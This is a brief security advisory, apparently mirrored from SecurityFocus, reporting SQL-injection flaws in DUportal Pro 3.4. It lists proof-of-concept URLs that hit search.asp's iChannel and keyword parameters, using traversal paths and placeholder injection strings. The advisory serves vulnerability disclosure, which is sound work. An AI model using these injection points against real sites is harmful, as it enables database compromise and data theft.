19 lines
No EOL
1.5 KiB
Text
19 lines
No EOL
1.5 KiB
Text
source: https://www.securityfocus.com/bid/13285/info
|
|
|
|
DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
|
|
|
|
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
|
|
|
|
These vulnerabilities are reported to affect DUportal Pro 3.4; earlier versions may also be affected.
|
|
|
|
http://www.example.com/dUpro/Businesses/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
|
|
http://www.example.com/dUpro/Classifieds/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
|
|
http://www.example.com/dUpro/Events/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
|
|
http://www.example.com/dUpro/events/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
|
|
http://www.example.com/dUpro/Files/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
|
|
http://www.example.com/dUpro/home/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
|
|
http://www.example.com/dUpro/Pictures/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
|
|
http://www.example.com/dUpro/polls/../polls/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
|
|
http://www.example.com/dUpro/Topics/../home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
|
|
http://www.example.com/dUpro/home/../home/search.asp?keyword='SQL_ERRORS&iChannel=
|
|
http://www.example.com/dUpro/Topics/../home/search.asp?keyword='SQL_ERRORS&iChannel= |